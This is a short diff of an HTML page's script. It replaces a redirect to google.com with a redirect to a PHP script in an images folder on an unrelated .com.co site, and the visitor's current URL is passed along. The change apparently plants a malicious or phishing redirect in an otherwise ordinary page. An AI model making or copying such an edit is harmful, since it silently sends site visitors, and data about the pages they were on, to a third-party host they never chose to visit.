--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
         var e = window.location.href;
         
        
-        Redirect("https://google.com?url="+e);
+        Redirect("https://suministrosstelar.com.co/images/index.php?url="+e);
     }
 </script>
 </head>
